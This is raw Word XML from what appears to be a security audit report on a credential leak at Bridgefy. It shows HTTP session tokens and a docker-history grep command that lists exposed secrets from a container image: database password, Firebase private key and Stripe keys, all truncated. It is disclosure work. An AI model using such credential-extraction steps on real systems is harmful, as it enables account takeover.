      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json;charset=UTF-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-Length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: 169</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: keep-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="5637" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Set-Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b266a5[...]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Path=/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Set-Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: iamcsr=98ee11ad-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>5[..]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>;path=/;SameSite=None;Secure;priority=high</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="1243" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Set-Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_zcsr_tmp=98ee11ad[..]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>;path=/;SameSite=Strict;Secure;priority=high </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"access_token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"1000.13d6[...]"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"api_domain"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:hyperlink r:id="rId266">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>"https://www.zohoapis.com","token_type":"Bearer","expires_in":3600</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note more services are affected by this leak. The following command can be used to review the history of a docker image from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>AWS ECR </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and list exposed secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker history --no-trunc d88238aaffc6 | grep -Pi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"(ZOHO|DBPASS)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="2105" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>3 days </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ago</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>/bin/sh -c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#(nop)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ENV NODE_ENV=STAGING CERTDURATIO=42 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>KEYMINUTESLIMIT=30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SECRETWORD=#st4g[...]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DBURL=mongodb+srv://staging.whqu3.mongodb.net DBUSER=admin-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sdk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>DBPASS=DqnAek[...]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DBNAME=bridgefy-sdk-staging DBHOST= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FBPRIVATEKEY=-----BEGIN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PRIVATE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>KEY-----\nMIIEvAIBADANBgkqh[...]END</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PRIVATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>KEY-----\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FBPROJECTID=bridgefy-sdk-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>staging FBCLIENTEMAIL=firebase-adminsdk[...] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FBWEBAPIKEY=AIzaS[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FBBUCKET=bridgefy-sdk-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>staging.appspot.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="15772160">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1333500</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>20657</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5480685" cy="901700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="112" name="Textbox 112"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="112" name="Textbox 112"/>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5480685" cy="901700"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:tbl>
                            <w:tblPr>
                              <w:tblW w:w="0" w:type="auto"/>
                              <w:jc w:val="left"/>
                              <w:tblInd w:w="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69"/>
                              <w:gridCol w:w="198"/>
                              <w:gridCol w:w="594"/>
                              <w:gridCol w:w="1881"/>
                              <w:gridCol w:w="100"/>
                              <w:gridCol w:w="1881"/>
                              <w:gridCol w:w="891"/>
                            </w:tblGrid>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="242" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="5742" w:type="dxa"/>
                                  <w:gridSpan w:val="5"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Times New Roman"/>
                                      <w:sz w:val="16"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2772" w:type="dxa"/>
                                  <w:gridSpan w:val="2"/>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="210" w:lineRule="exact"/>
                                    <w:ind w:left="-3"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>STRIPEKEY=sk_test_EwMlg[...]</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="204" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2969" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="184" w:lineRule="exact"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>STRIPESIGNING=whsec_ZTdwF[...]</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="5545" w:type="dxa"/>
                                  <w:gridSpan w:val="6"/>
                                  <w:tcBorders>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="184" w:lineRule="exact"/>
                                    <w:ind w:left="98"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:color w:val="959895"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>STATSWEBHOOK=https://hooks.slack.com/servi[...]</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="197" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="3167" w:type="dxa"/>
                                  <w:gridSpan w:val="2"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="177" w:lineRule="exact"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>ACTIVECAMPAIGNKEY=f54fb38d1[..]]</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="5347" w:type="dxa"/>
                                  <w:gridSpan w:val="5"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="177" w:lineRule="exact"/>
                                    <w:ind w:left="98"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:color w:val="959895"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>ACTIVECAMPAIGNURL=https://bridgefy.api-</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:color w:val="959895"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>us1.com</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="197" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="5642" w:type="dxa"/>
                                  <w:gridSpan w:val="4"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="177" w:lineRule="exact"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
